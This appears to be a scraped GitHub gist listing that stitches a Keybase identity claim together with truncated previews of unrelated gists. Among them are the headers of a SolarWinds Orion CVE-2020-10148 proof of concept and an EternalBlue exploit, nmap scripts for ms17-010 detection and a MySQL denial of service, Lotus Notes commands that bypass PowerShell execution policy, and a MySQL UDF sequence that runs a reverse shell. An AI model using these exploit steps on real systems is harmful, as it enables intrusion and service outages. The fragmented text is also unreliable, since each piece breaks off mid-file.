I hereby claim:
- I am shaheemirza on github.
- I am shaheemirza (https://keybase.io/shaheemirza) on keybase.
- I have a public key ASBTxO-YmsRzRF9C1e7DfUKX7EMIPJui-OwN0ml7-w7DXgo
To claim this, I am signing this object:
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
I hereby claim:
To claim this, I am signing this object:
| import os | |
| import sys | |
| import time | |
| import struct | |
| import select | |
| import binascii | |
| import bluetooth | |
| from bluetooth import _bluetooth as bt |
| "C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
| NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
| Hashes of each binary (prepare for onslaught of md5 naysayers): | |
| Notes.exe — 8f633ef1e1147637c25dd917909cd361 | |
| NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126 |
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| local smb = require "smb" | |
| local vulns = require "vulns" | |
| local stdnse = require "stdnse" | |
| local string = require "string" | |
| description = [[ | |
| Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code | |
| execution vulnerability (ms17-010). | |
| The script connects to the $IPC tree, executes a transaction on FID 0 and |
| description=[[ | |
| CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL. | |
| Warning: This WILL cause DoS on vulnerable mysql machines. | |
| Thanks: SECWORKS, hackers.mu team. | |
| ]] | |
| --- | |
| --@usage nmap -sU -p <portnum> --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports=<ports> <target> | |
| --@output | |
| --PORT STATE SERVICE |
| #!/bin/bash | |
| # Sign a file with a private key using OpenSSL | |
| # Encode the signature in Base64 format | |
| # | |
| # Usage: sign <file> <private_key> | |
| # | |
| # NOTE: to generate a public/private key use the following commands: | |
| # | |
| # openssl genrsa -aes128 -passout pass:<passphrase> -out private.pem 2048 | |
| # openssl rsa -in private.pem -passin pass:<passphrase> -pubout -out public.pem |
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
| openssl rsa -in ~/.ssh/id_rsa -outform pem > id_rsa.pem | |
| chmod 700 id_rsa.pem |